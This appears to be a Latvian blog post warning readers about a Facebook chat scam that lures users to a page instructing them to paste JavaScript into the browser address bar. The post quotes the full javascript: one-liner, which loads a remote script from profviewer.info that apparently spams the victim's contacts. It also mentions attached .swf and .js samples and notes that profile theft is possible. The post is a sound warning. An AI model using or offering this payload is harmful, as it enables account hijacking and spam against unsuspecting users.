Šodien fb čatā no drauga saņēmu ziņu:
Ņemot vērā, ka šāds likās gana aizdomīgs, pievērsu uzmanību un izmēģināju līdz galam.
Atverot saiti atveras facebook.com lapa: http://www.facebook.com/pages/You-will-Hate-Lady-Gaga-after-watching-this-video/240965975962567
.
Un pēc tam – nospiežot uz CONTINUE, parādās viltīga instrukcija:
Un patiešām – izpildot šādu procesu adrešu joslā iekopēsies Javascirpt pieprasījums! 🙂
javascript:(a=(b=document).createElement(‘script’)).src=
‘http://profviewer.info/new.js’,b.body.appendChild(a);void(0)
Atliek tikai nospiest ENTER un “laikam” visiem jūsu kontaktiem nosūtīsies privāts ziņojums ar sākumā minēto tekstu.
Man necēlās roka to izmēģināt, bet ticot draugam, kuram tieši tā arī notika 🙂 iesaku pārējiem uzmanīties.
Pielikumā arī .swf un .js failiņi, kam ir interese papētīt! 🙂
Kruti, tas strādā līdzīgi kā XSS injekcija, tikai tas ir nevis caurums, bet vienkārši ķer cilvēkus uz muļķi.
Līdzīgā veidā varētu arī zagt profilus, aizņemoties e-pastu un nomainot paroli.
Vienīgais, ko Facebook šajā sakarā var iesākt – dzēst šādas aplikācijas cik ātri iespējams. Ja ieviestu aplikācijas čekošanu pirms apstiprināšanas, tad uz aplikācijas apstiprināšanu varētu nākties gaidīt ļoti ilgi. Nekādu citu risinājumu tā ātrumā iedomāties nevaru.